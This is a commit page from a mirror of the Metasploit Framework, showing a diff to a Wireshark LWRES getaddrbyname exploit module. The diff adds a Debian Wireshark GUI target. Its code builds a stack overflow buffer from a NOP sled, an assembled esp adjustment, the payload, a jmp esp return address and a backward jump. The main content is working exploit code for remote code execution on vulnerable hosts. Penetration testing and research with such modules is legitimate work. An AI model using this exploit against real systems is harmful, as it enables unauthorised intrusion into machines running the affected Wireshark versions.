infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

add silly jmp esp target for wireshark gui on debian 

git-svn-id: file:///home/svn/framework3/trunk@8360 4d416f70-5f16-0410-b530-b9f4589650da
unstable
Joshua Drake 2010-02-03 00:08:28 +00:00
parent 4e582bd10b
commit a41647a922
1 changed files with 19 additions and 5 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

24
modules/exploits/multi/misc/wireshark_lwres_getaddrbyname.rb
View File

@ -78,10 +78,14 @@ class Metasploit3 < Msf::Exploit::Remote
{ {
'Arch' => ARCH_X86, 'Arch' => ARCH_X86,
'Platform' => 'linux', 'Platform' => 'linux',
'Ret' => 0xdeadbeef, # see tshark target (same deal, diff addr) # the method for tshark doesn't work, since there aren't any convenient
# pointers lying around (in reg/close on stack)
#
# since the wireshark bin has a jmp esp, we'll just use that method..
'Ret' => 0x818fce8, # jmp esp in wireshark bin
'RetOff' => 376, 'RetOff' => 376,
'Readable' => 0x8066a40, # just any old readable addr 'Readable' => 0x8066a40, # just any old readable addr (unused)
'GotAddr' => 0x818601c # objdump -R wireshark | grep g_slist_append 'GotAddr' => 0x818601c # objdump -R wireshark | grep g_slist_append (unused)
} }
], ],
@ -129,7 +133,8 @@ class Metasploit3 < Msf::Exploit::Remote
ret_offset = target['RetOff'] ret_offset = target['RetOff']
# we have different techniques depending on the target # we have different techniques depending on the target
if (target.name =~ /Debian 5\.0\.3/) if (target == targets[0])
# debian tshark
str = make_nops(ret_offset - payload.encoded.length - 16) str = make_nops(ret_offset - payload.encoded.length - 16)
str << payload.encoded str << payload.encoded
str << [target['GotAddr'] - 0xc].pack('V') str << [target['GotAddr'] - 0xc].pack('V')
@ -137,7 +142,16 @@ class Metasploit3 < Msf::Exploit::Remote
str << [target['Readable']].pack('V') str << [target['Readable']].pack('V')
str << rand_text(4) str << rand_text(4)
# ret is next # ret is next
#str = Rex::Text.pattern_create(ret_offset) elsif (target == targets[1])
fix_esp = Metasm::Shellcode.assemble(Metasm::Ia32.new, "add esp,-3500").encode_string
str = make_nops(ret_offset - fix_esp.length - payload.encoded.length)
str << fix_esp
str << payload.encoded
# jmp esp...
str << [target.ret].pack('V')
# jump back
distance = ret_offset + 4
str << Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-" + distance.to_s).encode_string
else else
# this is just a simple DoS payload # this is just a simple DoS payload
str = Rex::Text.pattern_create(ret_offset) str = Rex::Text.pattern_create(ret_offset)